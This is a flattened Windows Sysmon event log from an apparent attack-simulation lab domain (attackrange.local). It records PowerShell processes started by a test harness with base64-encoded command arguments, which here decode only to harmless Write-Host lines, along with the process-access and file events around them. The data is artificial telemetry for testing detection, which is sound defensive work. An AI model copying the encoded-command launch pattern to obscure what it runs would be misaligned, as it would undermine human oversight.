16:52:19.981{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235156Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.981{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D43-603E-5EAA-00000000AD01}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002235155Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.981{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6D43-603E-5EAA-00000000AD01}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49a232(wow64) 154100x80000000000000002235154Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.989{05ADC7E1-6D43-603E-5EAA-00000000AD01}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -En VwByAGkAdABlAC0ASABvAHMAdAAgADYAOAA1AGEAZAA5ADAAZQAtADIANQAxAGIALQA0AGYANwA5AC0AYQAyAGIANwAtADYAYgBlADMAZgBlADYAMwAzAGUAMQA3AA==C:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002235153Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.965{05ADC7E1-6D43-603E-5DAA-00000000AD01}16372ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235152Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.856{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D43-603E-5DAA-00000000AD01}16372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235151Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.856{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D43-603E-5DAA-00000000AD01}16372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235150Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.817{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D43-603E-5DAA-00000000AD01}16372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235149Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.817{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D43-603E-5DAA-00000000AD01}16372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002235148Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:19.793{05ADC7E1-6D43-603E-5DAA-00000000AD01}16372\PSHost.132591775396969435.16372.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002235147Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.762{05ADC7E1-6D43-603E-5DAA-00000000AD01}16372ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_rs2kg5cs.kui.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235146Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.762{05ADC7E1-6D43-603E-5DAA-00000000AD01}16372ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_vmmoisfm.uex.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002235145Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.746{05ADC7E1-6D43-603E-5DAA-00000000AD01}16372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_vmmoisfm.uex.ps12021-03-02 16:52:19.746 10341000x80000000000000002235144Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.723{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D43-603E-5DAA-00000000AD01}16372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235143Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.699{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6D43-603E-5DAA-00000000AD01}16372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235142Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.684{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235141Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.684{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235140Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.684{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235139Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.684{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235138Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.684{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D43-603E-5DAA-00000000AD01}16372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002235137Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.684{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6D43-603E-5DAA-00000000AD01}16372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49a232(wow64) 154100x80000000000000002235136Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.696{05ADC7E1-6D43-603E-5DAA-00000000AD01}16372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -E VwByAGkAdABlAC0ASABvAHMAdAAgAGQAOQBhAGIAMABjAGMAYgAtADUANQAzADIALQA0ADgANQA0AC0AOABkADYAZAAtADUAYQBkADkAMAA0ADgAOABhAGUAOAA2AA==C:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002235135Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.668{05ADC7E1-6D43-603E-5CAA-00000000AD01}9452ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235134Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.559{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D43-603E-5CAA-00000000AD01}9452C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235133Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.559{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D43-603E-5CAA-00000000AD01}9452C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235132Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.523{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D43-603E-5CAA-00000000AD01}9452C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235131Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 